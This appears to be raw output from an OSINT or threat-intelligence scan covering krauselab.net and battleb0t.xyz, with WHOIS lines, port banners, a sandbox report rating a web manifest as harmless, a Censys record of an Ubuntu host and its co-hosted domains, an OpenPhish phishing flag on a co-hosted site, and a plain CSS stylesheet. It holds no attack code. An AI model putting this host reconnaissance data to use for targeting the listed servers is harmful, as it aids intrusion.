Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Registrar Abuse Contact Email: domain.operations@web.com
Registrar Abuse Contact Phone: +1.8777228662
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
|
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 7c5e66b449bc299e-ORD
| 188.114.96.1 |
| 2023-05-12 02:57:50 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://krauselab.net/site.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarE02F.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarDE87.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: krauselab.net\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: krauselab.net\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', 
u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_536"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_218_IE_EarlyTabStart_0xda4_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_218_ConnHashTable<536>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_218_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_218_IESQMMUTEX_0_331"\n "Local\\InternetShortcutMutex"\n "IsoScope_218_IESQMMUTEX_0_303"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_536"\n "IsoScope_218_IESQMMUTEX_0_519"\n "IsoScope_218_IE_EarlyTabStart_0xda4_Mutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': 
u'"CabDE76.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabE02E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "OYD0XE6J.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OYD0XE6J.txt]- [targetUID: 00000000-00000536]\n Dropped file: "9Y9YVR9G.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\9Y9YVR9G.txt]- [targetUID: 00000000-00002316]\n Dropped file: "5APKTSW0.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5APKTSW0.txt]- [targetUID: 00000000-00000536]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002316]\n "~DF5377A92EBB296218.TMP" has type "data"- Location: [%TEMP%\\~DF5377A92EBB296218.TMP]- [targetUID: 00000000-00000536]\n "TarE02F.tmp" has type "data"- Location: [%TEMP%\\TarE02F.tmp]- [targetUID: 00000000-00002316]\n "CabDE76.tmp" has 
type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabDE76.tmp]- [targetUID: 00000000-00002316]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "OYD0XE6J.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OYD0XE6J.txt]- [targetUID: 00000000-00000536]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "TarDE87.tmp" has type "data"- Location: [%TEMP%\\TarDE87.tmp]- [targetUID: 00000000-00002316]\n "_DD8BDE50-5BDB-11ED-8250-0800270E6663_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "CabE02E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabE02E.tmp]- [targetUID: 00000000-00002316]\n "_7E1294F2-5BD9-11ED-8250-0800270E6663_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF7333698817938F4A.TMP" has type "data"- Location: [%TEMP%\\~DF7333698817938F4A.TMP]- [targetUID: 00000000-00000536]\n "9Y9YVR9G.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\9Y9YVR9G.txt]- [targetUID: 00000000-00002316]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00000536]\n "~DF74DD668BCA207352.TMP" has type "data"- Location: [%TEMP%\\~DF74DD668BCA207352.TMP]- [targetUID: 00000000-00000536]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c 
+A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002316]\n "~DF98532742D1ACFD1C.TMP" has type "data"- Location: [%TEMP%\\~DF98532742D1ACFD1C.TMP]- [targetUID: 00000000-00000536]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://krauselab.net/site.webmanifest"\n Pattern match: "https://krauselab.net"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: krauselab.net\nDNT: 1\nConnection: Keep-Alive"'}], u'threat_level': 0, u'size': None, u'job_id': u'63645cc4c15a80501d788fe5', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'suspicious_identifiers': [], u'attck_id': u'T1071.001', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, 
u'technique': u'Web Protocols', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_ide | 34.148.97.127 |
| 2023-05-12 03:13:07 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00arthur00.github.io]
https://www.openphish.com/feed.txt | 00arthur00.github.io |
| 2023-05-12 02:55:15 | Raw Data from RIRs | No | Censys | 14 | 0 | 3 | 0 | None | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", 
"id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", 
"diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 
Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": 
"a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": false, "signature_algorithm": "SHA256-RSA"}, 
"issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne | 165.232.113.85 |
| 2023-05-12 02:54:13 | Web Content | No | Web Spider | 0 | 0 | 3 | 0 | None | /* CSS Mini Reset */
html, body, div, form, fieldset, legend, label { margin: 0; padding: 0; }
table { border-collapse: collapse; border-spacing: 0; }
th, td { text-align: left; vertical-align: top; }
h1, h2, h3, h4, h5, h6, th, td, caption { font-weight:normal; }
img { border: 0; }
/* Fonts */
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-Bold'), url('./fonts/AvenirNext-Bold.woff2');
font-weight: 700;
font-style: normal;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-BoldItalic'), url('./fonts/AvenirNext-BoldItalic.woff2');
font-weight: 700;
font-style: italic;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-DemiBold'), url('./fonts/AvenirNext-DemiBold.woff2');
font-weight: 600;
font-style: normal;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-DemiBoldItalic'), url('./fonts/AvenirNext-DemiBoldItalic.woff2');
font-weight: 600;
font-style: italic;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-Heavy'), url('./fonts/AvenirNext-Heavy.woff2');
font-weight: 900;
font-style: normal;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-HeavyItalic'), url('./fonts/AvenirNext-HeavyItalic.woff2');
font-weight: 900;
font-style: italic;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-Italic'), url('./fonts/AvenirNext-Italic.woff2');
font-weight: 400;
font-style: italic;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-Medium'), url('./fonts/AvenirNext-Medium.woff2');
font-weight: 500;
font-style: normal;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-MediumItalic'), url('./fonts/AvenirNext-MediumItalic.woff2');
font-weight: 500;
font-style: italic;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-Regular'), url('./fonts/AvenirNext-Regular.woff2');
font-weight: 400;
font-style: normal;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-UltraLight'), url('./fonts/AvenirNext-UltraLight.woff2');
font-weight: 200;
font-style: normal;
}
@font-face {
font-family: 'Avenir Next';
src: local('AvenirNext-UltraLightItalic'), url('./fonts/AvenirNext-UltraLightItalic.woff2');
font-weight: 200;
font-style: italic;
}
/* Site Styles */
:root {
--c-primary: rgb(209, 197, 173);
--c-secondary: rgba(200,200,200,.85);
--c-tertiary: hsl(88, 25%, 11%, .5);
--v-space: 6rem;
--canvas-height: 80vh;
--f-weight: 600;
--border-radius: min(10vw, var(--v-space));
}
html {
font-size: 16px;
line-height: 1.5;
background: rgb(15, 15, 16);
/* font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", sans-serif; */
font-family: "Avenir Next", Avenir, "Helvetica Neue", sans-serif;
color: var(--c-secondary);
box-sizing: border-box;
}
.canvas-container {
position: fixed;
top: 0;
right: 0;
left: 0;
height: 100vh;
z-index: 1;
pointer-events: none;
}
a {
color: var(--c-primary);
/* text-decoration: none; */
font-weight: var(--f-weight);
}
a:hover {
text-decoration: none;
}
main {
/* visibility: hidden; */
display: grid;
grid-template-columns: 1fr 6fr 4fr 1fr;
grid-template-rows: 1fr 3fr auto;
grid-template-areas:
". header header ."
". intro . ."
". timeline timeline ."
"footer footer footer footer";
}
.logo {
margin: var(--v-space) 0 0 0;
opacity: 0;
will-change: opacity;
grid-area: header;
align-self: end;
}
.no-js .logo { opacity: 1; }
.loaded .logo {
animation-name: fadeIn;
animation-duration: 2s;
animation-delay: .25s;
animation-timing-function: ease-out;
animation-fill-mode: forwards;
}
.logo a {
font-size: 6.5rem;
font-weight: 700;
line-height: 0.8;
text-decoration: none;
}
.type-primary {
font-weight: var(--f-weight);
font-size: 3rem;
line-height: 1.4;
}
.intro {
/* z-index: 2; */
opacity: 0;
will-change: opacity;
margin: var(--v-space) 0;
grid-area: intro;
align-self: end;
}
.no-js .intro { opacity: 1; }
.loaded .intro {
animation-name: fadeIn;
animation-duration: 2.2s;
animation-delay: .5s;
animation-timing-function: ease-out;
animation-fill-mode: forwards;
}
.timeline {
grid-area: timeline;
}
.timeline-entry {
z-index: 2;
background: var(--c-tertiary);
backdrop-filter: saturate(180%) blur(40px);
-webkit-backdrop-filter: saturate(180%) blur(40px);
position: relative;
padding: calc(var(--v-space)/2) 0;
display: grid;
grid-template-columns: 1fr 5fr 5fr 1fr;
grid-template-rows: auto;
grid-template-areas:
". co description .";
}
.timeline-entry:first-child {
border-top-left-radius: var(--border-radius);
border-top-right-radius: var(--border-radius);
}
.timeline-entry:last-child {
border-bottom-left-radius: var(--border-radius);
border-bottom-right-radius: var(--border-radius);
}
.timeline-co {
margin: calc(var(--v-space) * .5) 0 0;
grid-area: co;
}
.timeline-co a {
color: var(--c-primary);
}
.timeline-time {
display: block;
}
.timeline-description {
margin: calc(var(--v-space) * .5) 0 0;
font-weight: normal;
font-size: 1.5rem;
line-height: 1.4;
grid-area: description;
}
footer {
grid-area: footer;
display: grid;
grid-template-columns: 1fr 5fr 5fr 1fr;
grid-template-rows: auto;
grid-template-areas:
". p p ."
}
footer .footer-content {
z-index: 1;
padding: var(--v-space) 0;
font-weight: var(--f-weight);
font-size: 1.5rem;
line-height: 1.4;
grid-area: p;
}
@media only screen and (max-width: 834px) {
:root {
--v-space: 4rem;
}
html {
font-size: 14px;
}
main {
grid-template-columns: 1fr 8fr 2fr 1fr;
}
}
@media only screen and (max-width: 736px) {
:root {
--v-space: 3rem;
}
html {
font-size: 12px;
}
main {
grid-template-columns: 1fr 10fr 0fr 1fr;
}
.timeline-entry {
grid-template-columns: 1fr 5fr 5fr 1fr;
grid-template-rows: 1fr auto;
grid-template-areas:
". hr hr ."
". co co ."
". description description .";
}
}
@keyframes fadeIn {
0% { opacity: 0; }
100% { opacity: 1; }
} | https://battleb0t.xyz/./src/style.css?4 |
